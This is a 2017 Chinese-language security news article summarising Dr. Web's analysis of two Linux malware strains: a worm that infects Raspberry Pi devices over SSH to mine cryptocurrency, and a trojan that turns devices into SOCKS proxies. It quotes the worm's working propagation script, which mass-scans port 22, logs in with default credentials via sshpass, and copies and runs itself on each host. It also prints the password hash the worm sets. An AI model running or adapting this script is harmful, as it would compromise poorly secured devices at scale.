查看原文
其他

两款新型Linux恶意软件:一个感染树莓派挖加密货币,一个创建代理网络

2017-06-11 E安全 E安全

更多全球网络安全资讯尽在E安全官网www.easyaq.com


E安全6月11日讯 俄罗斯反病毒开发商Dr. Web公司的恶意软件研究人员们已经发现了两款新型Linux恶意软件,分别名为Kinux.Muldrop.14和Linux.ProxyM。

Kinux.Muldrop.14:主要用于挖掘加密货币

根据Dr. Web公司介绍,Kinux.Muldrop.14的能够感染树莓派(Raspberry Pi)设备以借此实现加密货币挖掘。该恶意软件于今年5月份被首次发现,研究人员们找到了一套包含压缩与加密应用程序的脚本。

Kinux.MulDrop.14主要针对具备SSH外部开放端口的非安全树莓派设备。

此Linux恶意软件为一款包含采矿程序的bash脚本,其利用gzip压缩并配合base64加密机制。一旦被启用,该脚本将关闭多个进程并安装其操作所需要的库。

一旦此Linux恶意软件成功感染设备,其即会首先修改“pi”帐户的密码内容:

\$6\$U1Nu9qCp\$FhPuo8s5PsQlH6lwUdTwFcAUPNzmr0pWCdNJj.p6l4Mzi8S867YLmc7BspmEH95POvxPQ3PzP029yT1L3yi6K1

另外,该恶意软件会关闭多项进程并安装ZMap以及sshpass等库。

在此之后,该恶意软件会启动一个加密货币挖掘进程,并利用ZMap扫描互联网以寻找其它可资感染的设备。

当此Linux恶意软件在互联网上找到某一台树莓派设备时,其会利用sshpass以尝试使用默认用户名“pi”及默认密码“raspberry”进行登录。

该恶意软件只会尝试使用数个值,这表明其专门针对Raspberry Pi设备。专家们认为,此恶意软件可实现进一步改进,从而在未来几周内用于攻击其它平台。

以下为Dr. Web公司公布的代码片段:

NAME=`mktemp -u 'XXXXXXXX'`

while [ true ]; do

FILE=`mktemp`

zmap -p 22 -o $FILE -n 100000

killall ssh scp

for IP in `cat $FILE`

do

sshpass -praspberry scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $MYSELF pi@$IP:/tmp/$NAME && echo $IP >> /tmp/.r && sshpass -praspberry ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" &

done

rm -rf $FILE

sleep 10

done

Linux.ProxyM:用于创建代理网络

Dr. Web公司的研究人员们还分析了另一款新型Linux恶意软件名为Linux.ProxyM,其主要用于创建代理网络。攻击者自2017年2月开始即利用此木马实施攻击,但直到5月底此类活动才达到顶峰。受到Linux.ProxyM感染的设备数量如今已经超过1万台。

下图所示为Dr. Web公司安全专家们所确定的Linux.ProxyM攻击活动数量。
 

该恶意代码会在受感染设备上创建一套SOCKS代理服务器,并将其用于中继恶意流量以掩饰真实来源。

11
E安全要闻简讯

官网:www.easyaq.com

2017年6月

01全球首例利用英特尔AMTSOL接口窃取敏感数据的攻击手段
02两款新型Linux恶意软件:一个挖加密货币,一个创建代理网络
03恐袭增多!欧盟想直接获取美国科技公司存储在各成员国的用户数据
04揭秘纽约无窗摩天大楼:隐藏NSA的监听基地,能抵御核爆
05德国总理默克尔谈安全威胁:数字世界也需要全球规则
06 谁黑了你的钱?!
07无需身份凭证,攻击者利用漏洞可任意登录FreeRADIUS

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存